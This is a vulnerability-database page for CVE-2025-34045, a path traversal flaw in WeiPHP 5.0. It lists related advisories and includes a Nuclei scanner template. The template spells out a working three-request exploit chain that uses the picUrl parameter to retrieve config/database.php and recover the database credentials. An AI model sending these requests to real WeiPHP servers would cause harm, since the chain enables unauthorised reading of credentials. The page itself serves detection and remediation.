Lucene search
K

WeiPHP 5.0 - Path Traversal

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

WeiPHP 5.0 path traversal via picUrl in _download_imgage allows unauthenticated arbitrary file reads.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-34045
26 Jun 202516:51
circl
CNNVD
Weiphp WeiPHP 路径遍历漏洞
26 Jun 202500:00
cnnvd
CVE
CVE-2025-34045
26 Jun 202515:51
cve
Cvelist
CVE-2025-34045 WeiPHP Path Traversal Arbitrary File Read
26 Jun 202515:51
cvelist
EUVD
EUVD-2025-19209
3 Oct 202520:07
euvd
NVD
CVE-2025-34045
26 Jun 202516:15
nvd
Positive Technologies
PT-2025-26994 · Weiphp · Weiphp
26 Jun 202500:00
ptsecurity
RedhatCVE
CVE-2025-34045
28 Jun 202516:23
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-34045
26 Jun 202500:00
vulncheck_kev
Vulnrichment
CVE-2025-34045 WeiPHP Path Traversal Arbitrary File Read
26 Jun 202515:51
vulnrichment
Rows per page
id: CVE-2025-34045

info:
  name: WeiPHP 5.0 - Path Traversal
  author: pikpikcu
  severity: high
  description: |
    WeiPHP 5.0 contains a path traversal caused by insufficient input validation of the picUrl parameter in /public/index.php/material/Material/_download_imgage, letting unauthenticated remote attackers read arbitrary files.
  impact: |
    Unauthenticated attackers can read arbitrary files including database configuration files through path traversal in the picUrl parameter, potentially exposing sensitive credentials.
  remediation: |
    Upgrade to WeiPHP version 5.1 or later that properly validates file paths in the Material API.
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
    - https://vulncheck.com/advisories/weiphp-path-traversal-file-read
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 3
  tags: cve,cve2025,weiphp,lfi,vuln,vkev

http:
  - raw:
      - |
        POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        "1":1

      - |
        GET /public/index.php/home/file/user_pics HTTP/1.1
        Host: {{Hostname}}

      - |
        GET {{endpoint}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: endpoint
        part: body
        regex:
          - '/public/uploads/picture/(.*.jpg)'
        internal: true

    matchers:
      - type: word
        part: body
        words:
          - https://weiphp.cn
          - WeiPHP
          - DB_PREFIX
        condition: and
# digest: 4a0a00473045022100f97b7d4a357ce9b4ccde9c4fda20aeca2fa0a0cf877b60c2879d8b275b117dd50220017e46ea405867f9f4ebbedbe4ea25be4fa5a4cdec973c0b20ff76cb0bc25e1e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 3.17.5
CVSS 48.7
EPSS0.04311
SSVC
6